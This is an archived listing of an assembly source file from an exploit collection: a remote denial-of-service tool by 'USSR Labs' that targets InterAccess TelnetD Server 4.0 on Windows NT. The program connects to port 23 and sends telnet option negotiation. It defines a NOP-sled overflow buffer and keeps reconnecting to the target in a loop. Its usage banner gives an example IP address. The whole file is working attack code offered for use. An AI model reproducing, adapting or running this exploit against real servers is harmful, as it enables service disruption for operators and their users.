home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / telnet / dostelnetdWin.zip.txt / MY.ASM < prev    next >
Encoding:
Assembly Source File  |  2000-02-24  |  8.6 KB  |  411 lines
  1. ; ****************************************************************************
  2. ; * Redistribution and use in source and binary forms, with or without
  3. ; * modification, are permitted provided that the following conditions
  4. ; * are met:
  5. ; * 1. Redistributions of source code must retain the above copyright
  6. ; *    notice, this list of conditions and the following disclaimer.
  7. ; * 2. Redistributions in binary form must reproduce the above copyright
  8. ; *    notice, this list of conditions and the following disclaimer in the
  9. ; *    documentation and/or other materials provided with the distribution.
  10. ; *
  11. ; * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
  12. ; * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
  13. ; * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
  14. ; * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
  15. ; * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
  16. ; * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
  17. ; * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
  18. ; * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
  19. ; * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
  20. ; * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
  21. ; * SUCH DAMAGE.
  22. ; *
  23. ; * www.ussrback.com
  24. ; * Source by: USSR Labs
  25. ; ***************************************************************************
  26.  
  27. .386p
  28. locals
  29. jumps
  30. .model flat, stdcall
  31.  
  32. extrn    GetCommandLineA:PROC
  33. extrn    GetStdHandle:PROC
  34. extrn    WriteConsoleA:PROC
  35. extrn    ExitProcess:PROC
  36. extrn    WSAStartup:PROC
  37. extrn    connect:PROC
  38. extrn    send:PROC
  39. extrn    recv:PROC
  40. extrn    WSACleanup:PROC
  41. extrn    htons:PROC
  42. extrn    socket:PROC
  43. extrn    inet_addr:PROC
  44. extrn    closesocket:PROC
  45. Extrn    GetModuleHandleA          : PROC
  46. Extrn    GetProcAddress              : PROC
  47. Extrn    lstrlenA              : PROC
  48. Extrn    Sleep                  : PROC
  49. .data
  50.  
  51.  
  52. telnetInit01 db 0ffh,0fbh,018h
  53. telnetInit02 db 0ffh,0fbh,020h
  54. telnetInit03 db 0ffh,0fbh,023h
  55. telnetInit04 db 0ffh,0fbh,024h
  56. telnetInit05 db 0ffh,0fah,018h,01,076h,074h,031h,030h,030h,0ffh,0f0h
  57. ;telnetInit05 db 0ffh,0fah,011h,00,011h,011h,011h,011h,011h,011h,011h
  58. telnetInit05_length   equ     $-telnetInit05
  59.  
  60. telnetInit06 db 0ffh,0fdh,03h
  61. telnetInit07 db 0ffh,0fbh,01h
  62. telnetInit08 db 0ffh,0fch,1fh
  63. telnetInit09 db 0ffh,0feh,05h
  64. telnetInit10 db 0ffh,0fch,21h
  65.  
  66. telnetInit11 db 0ffh,0fch,01h
  67. telnetInit12 db 0ffh,0fdh,01h
  68.  
  69. sploit_code label byte
  70. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  71. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  72. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  73. DB 144,144,144,144,235,254,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  74. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  75. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  76. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  77. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  78. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  79. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  80. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  81. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  82. DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  83. hola dd 0012f659h
  84. sploit_code_length   equ     $-sploit_code
  85.  
  86. Copy      db "InterAccess TelnetD Server 4.0 for Windows NT Remote D.O.S *ALL BUILDS*", 13, 10
  87.           db "by: U.s.s.R",13,10
  88.           db "for source code or binary go to: http://www.ussrback.com/",13,10,13,10
  89.           db "Usage: dietelnd HostIp", 13, 10
  90.           db "Example: dietelnd 216.141.76.14",13,10,0
  91. Copyl      equ $-Copy
  92.  
  93.  
  94. contador dd 0
  95. marquita dd 0
  96. wsadescription_len equ 256
  97. wsasys_status_len equ 128
  98. hProv                dd 0
  99. WSAdata struct
  100. wVersion dw ?
  101. wHighVersion dw ?
  102. szDescription db wsadescription_len+1 dup (?)
  103. szSystemStatus db wsasys_status_len+1 dup (?)
  104. iMaxSockets dw ?
  105. iMaxUdpDg dw ?
  106. lpVendorInfo dw ?
  107. WSAdata ends
  108. lpde_ThreadId dd 0
  109. sockaddr_in struct
  110. sin_family dw ?
  111. sin_port dw ?
  112. sin_addr dd ?
  113. sin_zero db 8 dup (0)
  114. sockaddr_in ends
  115. contadorthread dd 0
  116. wsadata WSAdata
  117. sin sockaddr_in
  118. sock dd ?
  119. numbase dd 10
  120. hostParamether db 256 dup (?)
  121. buffer dd 1000 dup (0)
  122. buffer2 dd 1000 dup (0)
  123.  
  124. i_cant_connect    db 'fatal: sorry i can',27h,'t connect to this host!',13,10
  125. i_cant_connectl equ $-i_cant_connect
  126.  
  127. SendingExploit  db 'ok!: Sending D.O.S To Host..',13,10
  128. SendingExploitl equ $-SendingExploit
  129.  
  130. include code.inc
  131.  
  132. cchWritten dd 0
  133. ConHandle dd 0
  134.  
  135. .code
  136. start:
  137.     xor    eax,eax
  138.     xor    ebx,ebx
  139.     xor    edx,edx
  140.     xor    ecx,ecx
  141.     xor    esi,esi
  142.     xor    edi,edi
  143.     xor    ebp,ebp
  144.     Push    -11
  145.     Call    GetStdHandle
  146.     Mov    [ConHandle],EAX
  147.     call    GetCommandLineA
  148.     mov    edi, eax
  149.     mov    ecx, -1
  150.     xor    al, al
  151.     push    edi
  152.     repnz    scasb
  153.     not    ecx
  154.     pop    edi
  155.     mov    al, 20h
  156.     repnz    scasb
  157.     dec    ecx
  158.     mov    esi, edi
  159.     cmp    byte ptr [esi],0
  160.     je    no_command_line
  161.     cmp    byte ptr [esi],20h
  162.     je    incrementa1
  163. continue:
  164.     lea    edi, hostParamether
  165.     rep    movsb
  166. fuckyou:
  167.     push    offset wsadata
  168.     push    0101h
  169.     call    WSAStartup
  170.     xor    eax, eax
  171.     push    eax
  172.     inc    eax
  173.     push    eax
  174.     inc    eax
  175.     push    eax
  176.     call    socket
  177.     mov    ebx,eax
  178.     mov    sock, eax
  179.     mov    sin.sin_family, 2
  180.     mov    eax,23d               ; port
  181.     push    eax
  182.     call    htons
  183.     mov    sin.sin_port, ax
  184.     push    offset hostParamether
  185.     call    inet_addr
  186.     mov    sin.sin_addr, eax
  187.     push    size sin
  188.     push    offset sin
  189.     push    ebx
  190.     call    connect
  191.     or    eax, eax
  192.     je    connectionworking
  193.     Write_Console <offset i_cant_connect > <i_cant_connectl >
  194.     jmp    fuckyou
  195. incrementa1:
  196.     inc   si
  197.     jmp   continue
  198. connectionworking:
  199.     pusha
  200.     xor    eax,eax
  201.     mov    edi, offset buffer
  202.     mov    ecx,1000
  203.     rep    stosb
  204.     popa
  205.     xor    eax, eax
  206.     push    eax
  207.     push    1000
  208.     push    offset buffer
  209.     push    sock
  210.     call    recv
  211.  
  212.     xor    eax, eax
  213.     push    eax
  214.     push    3
  215.     push    offset telnetInit01
  216.     push    ebx
  217.     call    send
  218.  
  219.     push    100
  220.     call    Sleep
  221.  
  222.     xor    eax, eax
  223.     push    eax
  224.     push    3
  225.     push    offset telnetInit02
  226.     push    ebx
  227.     call    send
  228.  
  229.     push    100
  230.     call    Sleep
  231.  
  232.     xor    eax, eax
  233.     push    eax
  234.     push    3
  235.     push    offset telnetInit03
  236.     push    ebx
  237.     call    send
  238.  
  239.  
  240.     push    100
  241.     call    Sleep
  242.  
  243.     xor    eax, eax
  244.     push    eax
  245.     push    3
  246.     push    offset telnetInit04
  247.     push    ebx
  248.     call    send
  249.  
  250.  
  251.     push    100
  252.     call    Sleep
  253.     pusha
  254.     xor    eax,eax
  255.     mov    edi, offset buffer
  256.     mov    ecx,1000
  257.     rep    stosb
  258.     popa
  259.     xor    eax, eax
  260.     push    eax
  261.     push    1000
  262.     push    offset buffer
  263.     push    sock
  264.     call    recv
  265.  
  266.  
  267.     push    100
  268.     call    Sleep
  269.     xor    eax, eax
  270.     push    eax
  271.         push    telnetInit05_length
  272.     push    offset telnetInit05
  273.     push    ebx
  274.     call    send
  275.  
  276.  
  277.     push    100
  278.     call    Sleep
  279.  
  280.     xor    eax, eax
  281.     push    eax
  282.     push    03h
  283.     push    offset telnetInit06
  284.     push    ebx
  285.     call    send
  286.  
  287.  
  288.     push    100
  289.     call    Sleep
  290.     xor    eax, eax
  291.     push    eax
  292.     push    03h
  293.     push    offset telnetInit07
  294.     push    ebx
  295.     call    send
  296.  
  297.     push    100
  298.     call    Sleep
  299.  
  300.     xor    eax, eax
  301.     push    eax
  302.     push    03h
  303.     push    offset telnetInit08
  304.     push    ebx
  305.     call    send
  306.  
  307.     push    100
  308.     call    Sleep
  309.  
  310.     xor    eax, eax
  311.     push    eax
  312.     push    03h
  313.     push    offset telnetInit09
  314.     push    ebx
  315.     call    send
  316.  
  317.  
  318.     push    100
  319.     call    Sleep
  320.     xor    eax, eax
  321.     push    eax
  322.     push    03h
  323.     push    offset telnetInit10
  324.     push    ebx
  325.     call    send
  326.  
  327.  
  328.     push    100
  329.     call    Sleep
  330.     pusha
  331.     xor    eax,eax
  332.     mov    edi, offset buffer
  333.     mov    ecx,1000
  334.     rep    stosb
  335.     popa
  336.  
  337.         Write_Console <offset SendingExploit > <SendingExploitl >
  338.  
  339.         push    sock
  340.         call    closesocket
  341.         call    WSACleanup
  342.         jmp     fuckyou
  343.  
  344.         xor     eax, eax
  345.     push    eax
  346.     push    1000
  347.     push    offset buffer
  348.     push    sock
  349.     call    recv
  350.     push    offset buffer+8
  351.     call    lstrlenA
  352.     Write_Console <offset buffer+8    > <eax >
  353.  
  354.     push    100
  355.     call    Sleep
  356.     xor    eax, eax
  357.     push    eax
  358.     push    03h
  359.     push    offset telnetInit11
  360.     push    ebx
  361.     call    send
  362.  
  363.     push    100
  364.     call    Sleep
  365.     xor    eax, eax
  366.     push    eax
  367.     push    03h
  368.     push    offset telnetInit12
  369.     push    ebx
  370.     call    send
  371.     Write_Console <offset SendingExploit > <SendingExploitl >
  372.     xor    eax,eax
  373.     mov    edi, offset buffer
  374.     mov    ecx,1000
  375.     rep    stosb
  376.  
  377.     push    100
  378.     call    Sleep
  379.     xor    eax, eax
  380.     push    eax
  381.     push    sploit_code_length
  382.     push    offset sploit_code
  383.     push    ebx
  384.     call    send
  385.  
  386.     pusha
  387.     xor    eax,eax
  388.     mov    edi, offset buffer
  389.     mov    ecx,1000
  390.     rep    stosb
  391.     popa
  392.     xor    eax, eax
  393.     push    eax
  394.     push    1000
  395.     push    offset buffer
  396.     push    sock
  397.     call    recv
  398.  
  399.     push    sock
  400.     call    closesocket
  401.     call    WSACleanup
  402. final_exit:
  403.     push    0
  404.     call    ExitProcess
  405. no_command_line:
  406.     Write_Console <offset Copy > <Copyl >
  407.     jmp   final_exit
  408.  
  409. end start
  410.  
  411.